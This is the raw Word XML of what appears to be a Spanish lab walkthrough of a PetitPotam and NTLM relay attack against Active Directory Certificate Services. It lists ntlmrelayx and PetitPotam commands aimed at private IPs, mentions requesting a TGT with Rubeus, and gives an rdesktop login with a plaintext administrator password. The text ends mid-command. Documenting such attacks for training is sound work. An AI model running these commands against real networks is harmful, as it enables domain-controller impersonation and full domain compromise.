    <w:p w14:paraId="6A972723" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B22F905" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B8170C" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C59064C" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="017E9344" wp14:editId="6FE45A76">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="74295"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="720954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0C59C3CF" w14:textId="3F2D3406" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                            <w:r w:rsidRPr="007F4577">
                              <w:t>sudo python3 ntlmrelayx.py -t http://192.168.1.</w:t>
                            </w:r>
                            <w:r w:rsidR="00603A68">
                              <w:t>80</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007F4577">
                              <w:t>/certsrv/certrqus.asp -smb2support --adcs --template DomainController</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F3C83B1" w14:textId="275D46AE" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                            <w:r>
                              <w:t>-t es la IP del servidor de certificado,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1DBFA639" w14:textId="1325E8D2" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                            <w:r>
                              <w:t xml:space="preserve">--template, es la plantilla para </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA710C">
                              <w:t>generar certificados de controlador de dominio.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B0EF8A4" w14:textId="7EA80118" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                            <w:r>
                              <w:t xml:space="preserve">--smbsupport, es para soportar </w:t>
                            </w:r>
                            <w:r w:rsidR="001964C6" w:rsidRPr="001964C6">
                              <w:t>SMBv2.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5182633C" w14:textId="716CD819" w:rsidR="001964C6" w:rsidRDefault="001964C6" w:rsidP="00E71ABA">
                            <w:r>
                              <w:t>--adcs, especifica que el ataq</w:t>
                            </w:r>
                            <w:r w:rsidR="00E25D51">
                              <w:t>u</w:t>
                            </w:r>
                            <w:r>
                              <w:t>e debe dirigirse a los Servicios de Certificados de Active Directory (AD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7E9344" id="_x0000_s1046" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517278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0C59C3CF" w14:textId="3F2D3406" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                      <w:r w:rsidRPr="007F4577">
                        <w:t>sudo python3 ntlmrelayx.py -t http://192.168.1.</w:t>
                      </w:r>
                      <w:r w:rsidR="00603A68">
                        <w:t>80</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007F4577">
                        <w:t>/certsrv/certrqus.asp -smb2support --adcs --template DomainController</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F3C83B1" w14:textId="275D46AE" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                      <w:r>
                        <w:t>-t es la IP del servidor de certificado,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1DBFA639" w14:textId="1325E8D2" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                      <w:r>
                        <w:t xml:space="preserve">--template, es la plantilla para </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA710C">
                        <w:t>generar certificados de controlador de dominio.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3B0EF8A4" w14:textId="7EA80118" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
                      <w:r>
                        <w:t xml:space="preserve">--smbsupport, es para soportar </w:t>
                      </w:r>
                      <w:r w:rsidR="001964C6" w:rsidRPr="001964C6">
                        <w:t>SMBv2.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5182633C" w14:textId="716CD819" w:rsidR="001964C6" w:rsidRDefault="001964C6" w:rsidP="00E71ABA">
                      <w:r>
                        <w:t>--adcs, especifica que el ataq</w:t>
                      </w:r>
                      <w:r w:rsidR="00E25D51">
                        <w:t>u</w:t>
                      </w:r>
                      <w:r>
                        <w:t>e debe dirigirse a los Servicios de Certificados de Active Directory (ADCS).</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E534A67" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5A457C" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E286775" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F15E34B" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BDB4C0" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE9A99A" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4772EA30" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00E71ABA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43215456" w14:textId="1E8EFF0B" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266F5B01" wp14:editId="1902F73A">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="673778746" name="Imagen 67377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5799" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380F5F7" w14:textId="49226E95" w:rsidR="00E71ABA" w:rsidRDefault="00006F61" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Antes de realizar esto añadiré como servidor DNS de mi máquina atacante al controlador de dominio</w:t>
      </w:r>
      <w:r w:rsidR="00E8374A">
        <w:t xml:space="preserve">, para esto modificaré el archivo que </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="00E8374A">
        <w:t xml:space="preserve"> en /etc/resolv.conf añadiendo la IP del controlador de dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C3DE5" w14:textId="77777777" w:rsidR="00E8374A" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44344C28" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176EF1DF" w14:textId="1CDD9E43" w:rsidR="00E71ABA" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D0D222A" wp14:editId="0231C71E">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2112735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35661" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160"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6D2BBB8D" w14:textId="77777777" w:rsidR="00E8374A" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FC77BC" w14:textId="3CB742CF" w:rsidR="00E8374A" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora prosigamos con la ejecución del comando anterior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1AF1A" w14:textId="77777777" w:rsidR="00E8374A" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6BFB02" w14:textId="77777777" w:rsidR="00E8374A" w:rsidRDefault="00E8374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721FF7C6" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D436D06" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B5CDCF" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0904D94A" w14:textId="1620B726" w:rsidR="00E71ABA" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001EE8C0" wp14:editId="569640ED">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33603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3399" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161"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0A48BCA" w14:textId="77777777" w:rsidR="004410D8" w:rsidRDefault="004410D8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E18BFEE" w14:textId="3F8ABE79" w:rsidR="008F75F0" w:rsidRDefault="008F75F0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>A continuación, obligamos a DC02 a autentificarse en nuestra máquina atacante con el exploit Petitpotam, requiere dos direcciones IP, una para nuestra máquina atacante y otra para el controlador de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30A564" w14:textId="77777777" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13644BE9" w14:textId="35E1420A" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo primero que haremos es git clone del proyecto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4581A" w14:textId="77777777" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601DB077" w14:textId="77777777" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6309CCC8" w14:textId="77777777" w:rsidR="004410D8" w:rsidRDefault="004410D8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7B5300" w14:textId="77777777" w:rsidR="007C0FE2" w:rsidRDefault="007C0FE2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B928B84" w14:textId="77777777" w:rsidR="007C0FE2" w:rsidRDefault="007C0FE2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D58893" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AED7F8" w14:textId="5B3432EE" w:rsidR="00E71ABA" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C92BE7B" wp14:editId="3EDCBB19">
            <wp:extent cx="5400040" cy="2336165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="644737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37210" name=""/>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5400040" cy="2336165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9249FB" w14:textId="77777777" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CA0CF7" w14:textId="79659036" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos el archivo Petitpotam.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391163B8" w14:textId="77777777" w:rsidR="0019776D" w:rsidRDefault="0019776D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B97989E" w14:textId="536A04E3" w:rsidR="00197969" w:rsidRDefault="00197969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="254A6111" wp14:editId="317A9288">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4902948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3478FFFE" w14:textId="03A0A0E9" w:rsidR="00197969" w:rsidRDefault="00197969">
                            <w:r w:rsidRPr="00197969">
                              <w:t>python3 PetitPotam.py 192.168.1.44 192.168.1.</w:t>
                            </w:r>
                            <w:r w:rsidR="00603A68">
                              <w:t>79</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="230D371E" w14:textId="264CAEC8" w:rsidR="00197969" w:rsidRDefault="00197969">
                            <w:r>
                              <w:t>Siendo la primera IP de la máquina atrapante y la segunda del controlador de dominio DCO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4A6111" id="_x0000_s1047" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517299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3478FFFE" w14:textId="03A0A0E9" w:rsidR="00197969" w:rsidRDefault="00197969">
                      <w:r w:rsidRPr="00197969">
                        <w:t>python3 PetitPotam.py 192.168.1.44 192.168.1.</w:t>
                      </w:r>
                      <w:r w:rsidR="00603A68">
                        <w:t>79</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="230D371E" w14:textId="264CAEC8" w:rsidR="00197969" w:rsidRDefault="00197969">
                      <w:r>
                        <w:t>Siendo la primera IP de la máquina atrapante y la segunda del controlador de dominio DCO2.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D9487C" w14:textId="77777777" w:rsidR="00197969" w:rsidRDefault="00197969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4113EF9C" w14:textId="77777777" w:rsidR="00197969" w:rsidRDefault="00197969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4F7D21" w14:textId="77777777" w:rsidR="00197969" w:rsidRDefault="00197969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D082400" w14:textId="77777777" w:rsidR="00E71ABA" w:rsidRDefault="00E71ABA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07776E4E" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE044C9" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD511C0" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573208D6" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0507FB7A" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517880FD" w14:textId="77D73A05" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D9D58B" wp14:editId="726B72BE">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102592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485" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"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F234769" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383E0753" w14:textId="1BBC89CB" w:rsidR="00AE4AB2" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>A qui el servidor solicito un certificado de CA y el certificado generado fue transmitido a nuestra máquina:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06050D" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C5AB0D" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122C91DC" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C92892" w14:textId="5A3EC28E" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34BA991A" wp14:editId="69B862B4">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81562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175" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"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939E6EE" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F85C7A" w14:textId="133E4803" w:rsidR="00AF63A3" w:rsidRDefault="00AF63A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Con el certificado generado, el atacante puede usarlo para suplantar la cu</w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>enta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Controlador de Dominio y solicitar un ticket TGT para autentificarse en nel controlador de dominio sin credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5910E" w14:textId="77777777" w:rsidR="00AF63A3" w:rsidRDefault="00AF63A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A060210" w14:textId="5D311CCA" w:rsidR="00AF63A3" w:rsidRDefault="00AF63A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El ticket TGT se solicita con Rubeus, solo se necesita una cuanta con privilegios de administrador local, y un CMD o PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25016ED5" w14:textId="77777777" w:rsidR="00AF63A3" w:rsidRDefault="00AF63A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE91CC8" w14:textId="16291495" w:rsidR="00603A68" w:rsidRDefault="00825FE6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso tenemos las claves de usuario, por lo tanto tenemos la clave de Administrador del equipo con la IP 192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="002F1C8E">
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002F1C8E">
        <w:t>sabiendo que la configuración de las dos máquinas es idéntica, es decir tiene la misma cuanta de Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38B0E5" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70590960" w14:textId="01940862" w:rsidR="00603A68" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora usaremos </w:t>
      </w:r>
      <w:r w:rsidR="000610CC">
        <w:t>rdesktop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para conectarnos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E5A4D" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ECAAA6" w14:textId="3020653B" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65D8493F" wp14:editId="357ED44C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1219222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72A290E4" w14:textId="62E37080" w:rsidR="001B29B0" w:rsidRDefault="001B29B0">
                            <w:r w:rsidRPr="001B29B0">
                              <w:t>rdesktop -u google.local\A</w:t>
                            </w:r>
                            <w:r w:rsidR="00316CB3">
                              <w:t>d</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001B29B0">
                              <w:t>ministrador -p abc123. 192.168.1.79</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="328788F2" w14:textId="62AF1AC3" w:rsidR="00737140" w:rsidRDefault="00737140">
                            <w:r>
                              <w:t>Indicando nombre de usuario, contraseña y la IP de la máquina a la que nos vamos a conect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D8493F" id="_x0000_s1048" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517319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&#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Bsex1K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72A290E4" w14:textId="62E37080" w:rsidR="001B29B0" w:rsidRDefault="001B29B0">
                      <w:r w:rsidRPr="001B29B0">
                        <w:t>rdesktop -u google.local\A</w:t>
                      </w:r>
